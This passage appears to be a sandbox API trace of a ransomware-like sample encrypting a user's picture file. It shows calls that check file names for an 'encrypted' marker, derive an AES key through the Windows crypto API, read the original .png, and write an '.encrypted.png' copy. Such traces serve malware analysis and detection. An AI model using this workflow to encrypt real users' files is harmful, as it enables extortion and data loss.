hFindFile=0x7c20c0) returned 1 [0039.367] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0039.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0039.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AwaHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="waHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aHoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HoW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oW6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" ZD3.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.369] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0039.369] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0039.369] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.369] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0039.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.369] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.370] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0039.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0039.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.370] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0039.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0039.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0039.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0039.370] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0039.370] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0039.370] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1a3d90, ftCreationTime.dwHighDateTime=0x1d5bcad, ftLastAccessTime.dwLowDateTime=0x38fb4360, ftLastAccessTime.dwHighDateTime=0x1d5c4a0, ftLastWriteTime.dwLowDateTime=0x38fb4360, ftLastWriteTime.dwHighDateTime=0x1d5c4a0, nFileSizeHigh=0x0, nFileSizeLow=0x1801b, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="AwaHoW6K ZD3.png", cAlternateFileName="AWAHOW~1.PNG")) returned 0x7c2240 [0039.370] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.370] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.370] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.370] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.371] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.371] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0039.371] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.371] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0039.371] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.371] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.371] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0039.371] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.371] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.371] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0039.372] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0039.372] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.372] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0039.372] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.372] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.372] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.372] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.372] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.372] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.373] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0039.373] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0039.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0039.373] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.373] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0039.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0039.373] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0039.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0039.373] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.373] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0039.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.373] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.373] CryptDestroyHash (hHash=0x7c2100) returned 1 [0039.373] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\awahow6k zd3.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.374] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.374] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0039.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0039.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0039.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0039.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0039.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0039.374] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.encrypted.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\awahow6k zd3.encrypted.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0039.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0039.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0039.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0039.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0039.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0039.375] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0039.375] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0039.377] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x801b, lpOverlapped=0x0) returned 1 [0039.377] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0039.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0039.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1801b) returned 0xac0018 [0039.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0039.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0039.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0039.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0039.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1801b) returned 0x935008 [0039.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0039.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.381] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0039.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1801b) returned 0xac0018 [0039.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0039.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0039.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.381] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.382] 